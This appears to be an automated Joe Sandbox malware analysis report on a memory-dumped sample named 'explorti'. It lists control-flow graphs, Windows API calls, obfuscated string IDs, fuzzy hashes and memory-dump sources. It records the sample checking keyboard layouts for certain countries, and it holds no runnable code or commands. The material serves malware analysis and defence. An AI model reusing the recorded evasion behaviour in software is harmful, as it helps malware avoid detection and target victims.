                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 1e9bb429261493f1c7ef1dbc5a0424fdc6d5ffa40929268274108e35c02ea1a0
                      • Instruction ID: 9cf1acf4d79d3316d21df3c77ebe7f6a9b7cbeea078fde521461a984c00549a4
                      • Opcode Fuzzy Hash: 1e9bb429261493f1c7ef1dbc5a0424fdc6d5ffa40929268274108e35c02ea1a0
                      • Instruction Fuzzy Hash: 53E19C71910218ABEB25DFA4CC8DBEEB779EB04340F5042D9E508A7291D7749BD4CF91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1003 2b7d00-2b7d82 call 2e4020 1007 2b7d88-2b7db0 call 2c7870 call 2b5b20 1003->1007 1008 2b827e-2b829b call 2ccf21 1003->1008 1015 2b7db2 1007->1015 1016 2b7db4-2b7dd6 call 2c7870 call 2b5b20 1007->1016 1015->1016 1021 2b7dda-2b7df3 1016->1021 1022 2b7dd8 1016->1022 1025 2b7df5-2b7e04 1021->1025 1026 2b7e24-2b7e4f 1021->1026 1022->1021 1027 2b7e1a-2b7e21 call 2cd593 1025->1027 1028 2b7e06-2b7e14 1025->1028 1029 2b7e51-2b7e60 1026->1029 1030 2b7e80-2b7ea1 1026->1030 1027->1026 1028->1027 1033 2b829c call 2e6b9a 1028->1033 1035 2b7e62-2b7e70 1029->1035 1036 2b7e76-2b7e7d call 2cd593 1029->1036 1031 2b7ea3-2b7ea5 GetNativeSystemInfo 1030->1031 1032 2b7ea7-2b7eac 1030->1032 1037 2b7ead-2b7eb6 1031->1037 1032->1037 1044 2b82a1-2b82a6 call 2e6b9a 1033->1044 1035->1033 1035->1036 1036->1030 1042 2b7eb8-2b7ebf 1037->1042 1043 2b7ed4-2b7ed7 1037->1043 1046 2b8279 1042->1046 1047 2b7ec5-2b7ecf 1042->1047 1048 2b821f-2b8222 1043->1048 1049 2b7edd-2b7ee6 1043->1049 1046->1008 1051 2b8274 1047->1051 1048->1046 1054 2b8224-2b822d 1048->1054 1052 2b7ef9-2b7efc 1049->1052 1053 2b7ee8-2b7ef4 1049->1053 1051->1046 1056 2b81fc-2b81fe 1052->1056 1057 2b7f02-2b7f09 1052->1057 1053->1051 1058 2b822f-2b8233 1054->1058 1059 2b8254-2b8257 1054->1059 1062 2b820c-2b820f 1056->1062 1063 2b8200-2b820a 1056->1063 1064 2b7fe9-2b81e5 call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 call 2c7870 call 2b5b20 call 2b5640 call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 call 2c7870 call 2b5b20 call 2b5640 call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 call 2c7870 call 2b5b20 call 2b5640 1057->1064 1065 2b7f0f-2b7f6b call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 1057->1065 1066 2b8248-2b8252 1058->1066 1067 2b8235-2b823a 1058->1067 1060 2b8259-2b8263 1059->1060 1061 2b8265-2b8271 1059->1061 1060->1046 1061->1051 1062->1046 1069 2b8211-2b821d 1062->1069 1063->1051 1101 2b81eb-2b81f4 1064->1101 1088 2b7f70-2b7f77 1065->1088 1066->1046 1067->1066 1071 2b823c-2b8246 1067->1071 1069->1051 1071->1046 1090 2b7f7b-2b7f9b call 2e8a81 1088->1090 1091 2b7f79 1088->1091 1098 2b7f9d-2b7fac 1090->1098 1099 2b7fd2-2b7fd4 1090->1099 1091->1090 1103 2b7fae-2b7fbc 1098->1103 1104 2b7fc2-2b7fcf call 2cd593 1098->1104 1099->1101 1102 2b7fda-2b7fe4 1099->1102 1101->1048 1106 2b81f6 1101->1106 1102->1101 1103->1044 1103->1104 1104->1099 1106->1056
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002B7EA3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: HlurNa==$HlurOK==$HlusMa==
                      • API String ID: 1721193555-2203186029
                      • Opcode ID: 612acb643483fa16aec2024d2a1b0a45622bac2e6f0e9663d2e0820975bad580
                      • Instruction ID: 04f7922fb3cf0fe6ef1c6c4801418d67cc3a220c2af3afe1701d8008dcd116a3
                      • Opcode Fuzzy Hash: 612acb643483fa16aec2024d2a1b0a45622bac2e6f0e9663d2e0820975bad580
                      • Instruction Fuzzy Hash: 8AD13570E206549BDF15AF28CC4A7DD7B65AB46350F90429CE8196B3C2DB358EB08BD2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1233 2e6e01-2e6e36 GetFileType 1234 2e6eee-2e6ef1 1233->1234 1235 2e6e3c-2e6e47 1233->1235 1238 2e6f1a-2e6f42 1234->1238 1239 2e6ef3-2e6ef6 1234->1239 1236 2e6e69-2e6e85 call 2e4020 GetFileInformationByHandle 1235->1236 1237 2e6e49-2e6e5a call 2e7177 1235->1237 1249 2e6f0b-2e6f18 call 2e740d 1236->1249 1254 2e6e8b-2e6ecd call 2e70c9 call 2e6f71 * 3 1236->1254 1251 2e6f07-2e6f09 1237->1251 1252 2e6e60-2e6e67 1237->1252 1240 2e6f5f-2e6f61 1238->1240 1241 2e6f44-2e6f57 1238->1241 1239->1238 1244 2e6ef8-2e6efa 1239->1244 1246 2e6f62-2e6f70 call 2ccf21 1240->1246 1241->1240 1257 2e6f59-2e6f5c 1241->1257 1248 2e6efc-2e6f01 call 2e7443 1244->1248 1244->1249 1248->1251 1249->1251 1251->1246 1252->1236 1269 2e6ed2-2e6eea call 2e7096 1254->1269 1257->1240 1269->1240 1272 2e6eec 1269->1272 1272->1251
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 002E6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 002E6E7D
                      • __dosmaperr.LIBCMT ref: 002E6F12
                        • Part of subcall function 002E7177: __dosmaperr.LIBCMT ref: 002E71AC
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: ae3be08a18ec4846ce31f1b2323ded286cd5a9871fd245a47eed83f60ecbdd2d
                      • Instruction ID: 4824f6f3623a2b15b30afddf455e545e1591d4aa25b59423bf679b58becb8b66
                      • Opcode Fuzzy Hash: ae3be08a18ec4846ce31f1b2323ded286cd5a9871fd245a47eed83f60ecbdd2d
                      • Instruction Fuzzy Hash: A1418175960285ABCB24DFB6E8499AFBBF9EF98340B50442DF456D3610D630A814CB60

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1368 2ed4f4-2ed515 call 2cdeb0 1371 2ed52f-2ed532 1368->1371 1372 2ed517 1368->1372 1373 2ed54e-2ed55a call 2ea688 1371->1373 1375 2ed534-2ed537 1371->1375 1372->1373 1374 2ed519-2ed51f 1372->1374 1388 2ed55c-2ed55f 1373->1388 1389 2ed564-2ed570 call 2ed47e 1373->1389 1376 2ed543-2ed54c call 2ed43c 1374->1376 1377 2ed521-2ed525 1374->1377 1375->1376 1378 2ed539-2ed53c 1375->1378 1392 2ed58c-2ed595 1376->1392 1377->1373 1380 2ed527-2ed52b 1377->1380 1381 2ed53e-2ed541 1378->1381 1382 2ed572-2ed582 call 2e7443 call 2e6b8a 1378->1382 1380->1382 1385 2ed52d 1380->1385 1381->1376 1381->1382 1382->1388 1385->1376 1393 2ed6cb-2ed6da 1388->1393 1389->1382 1398 2ed584-2ed589 1389->1398 1396 2ed597-2ed59f call 2e8c8b 1392->1396 1397 2ed5a2-2ed5b3 1392->1397 1396->1397 1401 2ed5c9 1397->1401 1402 2ed5b5-2ed5c7 1397->1402 1398->1392 1404 2ed5cb-2ed5dc 1401->1404 1402->1404 1405 2ed5de-2ed5e0 1404->1405 1406 2ed64a-2ed65a call 2ed687 1404->1406 1408 2ed6db-2ed6dd 1405->1408 1409 2ed5e6-2ed5e8 1405->1409 1415 2ed65c-2ed65e 1406->1415 1416 2ed6c9 1406->1416 1413 2ed6df-2ed6e6 call 2e8cd3 1408->1413 1414 2ed6e7-2ed6fa call 2e651d 1408->1414 1411 2ed5ea-2ed5ed 1409->1411 1412 2ed5f4-2ed600 1409->1412 1411->1412 1417 2ed5ef-2ed5f2 1411->1417 1418 2ed602-2ed617 call 2ed4eb * 2 1412->1418 1419 2ed640-2ed648 1412->1419 1413->1414 1436 2ed6fc-2ed706 1414->1436 1437 2ed708-2ed70e 1414->1437 1422 2ed699-2ed6a2 1415->1422 1423 2ed660-2ed676 call 2ea531 1415->1423 1416->1393 1417->1412 1424 2ed61a-2ed61c 1417->1424 1418->1424 1419->1406 1447 2ed6a5-2ed6a8 1422->1447 1423->1447 1424->1419 1430 2ed61e-2ed62e 1424->1430 1435 2ed630-2ed635 1430->1435 1435->1406 1442 2ed637-2ed63e 1435->1442 1436->1437 1438 2ed73c-2ed747 call 2e7443 1436->1438 1439 2ed727-2ed738 RtlAllocateHeap 1437->1439 1440 2ed710-2ed711 1437->1440 1448 2ed749-2ed74b 1438->1448 1443 2ed73a 1439->1443 1444 2ed713-2ed71a call 2e9c81 1439->1444 1440->1439 1442->1435 1443->1448 1444->1438 1457 2ed71c-2ed725 call 2e8cf9 1444->1457 1451 2ed6aa-2ed6ad 1447->1451 1452 2ed6b4-2ed6bc 1447->1452 1451->1452 1453 2ed6af-2ed6b2 1451->1453 1452->1416 1454 2ed6be-2ed6c6 call 2ea531 1452->1454 1453->1416 1453->1452 1454->1416 1457->1438 1457->1439
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: hpG.
                      • API String ID: 0-3905535149
                      • Opcode ID: e810bcdf0636fdc7dd67306bf4be5e8851dee2fb714ee99edd500ba680e28bcd
                      • Instruction ID: d876078390df1376804a083519debfdfcea2df59be2013f9ff93ba505099981f
                      • Opcode Fuzzy Hash: e810bcdf0636fdc7dd67306bf4be5e8851dee2fb714ee99edd500ba680e28bcd
                      • Instruction Fuzzy Hash: F6614632DB02968FCF25EFAAE8857EDB7B4EB55314FE44116D4496B290D7309C208F51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1462 2b82b0-2b8331 call 2e4020 1466 2b833d-2b8365 call 2c7870 call 2b5b20 1462->1466 1467 2b8333-2b8338 1462->1467 1475 2b8369-2b838b call 2c7870 call 2b5b20 1466->1475 1476 2b8367 1466->1476 1468 2b847f-2b849b call 2ccf21 1467->1468 1481 2b838f-2b83a8 1475->1481 1482 2b838d 1475->1482 1476->1475 1485 2b83aa-2b83b9 1481->1485 1486 2b83d9-2b8404 1481->1486 1482->1481 1487 2b83bb-2b83c9 1485->1487 1488 2b83cf-2b83d6 call 2cd593 1485->1488 1489 2b8431-2b8452 1486->1489 1490 2b8406-2b8415 1486->1490 1487->1488 1493 2b849c-2b84a1 call 2e6b9a 1487->1493 1488->1486 1491 2b8458-2b845d 1489->1491 1492 2b8454-2b8456 GetNativeSystemInfo 1489->1492 1495 2b8427-2b842e call 2cd593 1490->1495 1496 2b8417-2b8425 1490->1496 1499 2b845e-2b8465 1491->1499 1492->1499 1495->1489 1496->1493 1496->1495 1499->1468 1504 2b8467-2b846f 1499->1504 1505 2b8478-2b847b 1504->1505 1506 2b8471-2b8476 1504->1506 1505->1468 1507 2b847d 1505->1507 1506->1468 1507->1468
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 002B8454
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: bd840843a022d81d797709e3c79fd8f64e2f862b148aaa53fdb96d63864c9a01
                      • Instruction ID: 817553d8e2900540aa388d7e0721016613e8900db07406c3f624560c728e29f6
                      • Opcode Fuzzy Hash: bd840843a022d81d797709e3c79fd8f64e2f862b148aaa53fdb96d63864c9a01
                      • Instruction Fuzzy Hash: 6D513B70D202199BDB24EF24CD49BDEB779EB45340F5042A9E80CA72C1EF315AA0CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1508 2e6c99-2e6ca5 1509 2e6ca7-2e6cc3 call 2e7430 call 2e7443 call 2e6b8a 1508->1509 1510 2e6cc4-2e6ce8 call 2e4020 1508->1510 1516 2e6cea-2e6d04 call 2e7430 call 2e7443 call 2e6b8a 1510->1516 1517 2e6d06-2e6d28 CreateFileW 1510->1517 1539 2e6d72-2e6d76 1516->1539 1518 2e6d2a-2e6d2e call 2e6e01 1517->1518 1519 2e6d38-2e6d3f call 2e6d77 1517->1519 1526 2e6d33-2e6d36 1518->1526 1530 2e6d40-2e6d42 1519->1530 1526->1530 1533 2e6d64-2e6d67 1530->1533 1534 2e6d44-2e6d61 call 2e4020 1530->1534 1537 2e6d69-2e6d6f 1533->1537 1538 2e6d70 1533->1538 1534->1533 1537->1538 1538->1539
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c90c95e477ae72d5fcca3f6f92b5ec55fee72d28ad1cbfa53e6bd403b29e2d43
                      • Instruction ID: 81f243c63d6e8a3cc65f9e21f2f0834cf0e29c052204652f59b256e291fcc8d6
                      • Opcode Fuzzy Hash: c90c95e477ae72d5fcca3f6f92b5ec55fee72d28ad1cbfa53e6bd403b29e2d43
                      • Instruction Fuzzy Hash: 78213D31A912887AEB117F659C49B9F37299F513B8FE04310F9243B1D1DB705E219AA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1542 2e6f71-2e6f87 1543 2e6f89-2e6f8d 1542->1543 1544 2e6f97-2e6fa7 1542->1544 1543->1544 1545 2e6f8f-2e6f95 1543->1545 1549 2e6fa9-2e6fbb SystemTimeToTzSpecificLocalTime 1544->1549 1550 2e6fe7-2e6fea 1544->1550 1546 2e6fec-2e6ff7 call 2ccf21 1545->1546 1549->1550 1552 2e6fbd-2e6fdd call 2e6ff8 1549->1552 1550->1546 1554 2e6fe2-2e6fe5 1552->1554 1554->1546
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 002E6FB3
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: a693aaaf8ce81d189ae1077564c7df3377dd6dcf8bdb6d59e5c35f507d8903fa
                      • Instruction ID: feb9e4ef0a293667deccdc293f68b11a3f03595878a537709862924995725fd7
                      • Opcode Fuzzy Hash: a693aaaf8ce81d189ae1077564c7df3377dd6dcf8bdb6d59e5c35f507d8903fa
                      • Instruction Fuzzy Hash: F3111F7291024DAACB00DED6D848EDFBBBCAB58360F504266E516E2180E730EB54CB61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1555 2ed6ef-2ed6fa 1556 2ed6fc-2ed706 1555->1556 1557 2ed708-2ed70e 1555->1557 1556->1557 1558 2ed73c-2ed747 call 2e7443 1556->1558 1559 2ed727-2ed738 RtlAllocateHeap 1557->1559 1560 2ed710-2ed711 1557->1560 1564 2ed749-2ed74b 1558->1564 1561 2ed73a 1559->1561 1562 2ed713-2ed71a call 2e9c81 1559->1562 1560->1559 1561->1564 1562->1558 1568 2ed71c-2ed725 call 2e8cf9 1562->1568 1568->1558 1568->1559
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,002EA5ED,?,002E74AE,?,00000000,?), ref: 002ED731
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 6dd599ea9959c00ac53858c7a87fbbd293fff42f63ba884d5b664e54ec701ae7
                      • Instruction ID: 731f2aa87052c24b46f777aaf9d56b242530e83bce92acec5b428f0db98c1145
                      • Opcode Fuzzy Hash: 6dd599ea9959c00ac53858c7a87fbbd293fff42f63ba884d5b664e54ec701ae7
                      • Instruction Fuzzy Hash: 0CF0E931AF51E6679B323F239C01B5BB7999F817B0B988522AC089A181CA71E82046E1

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
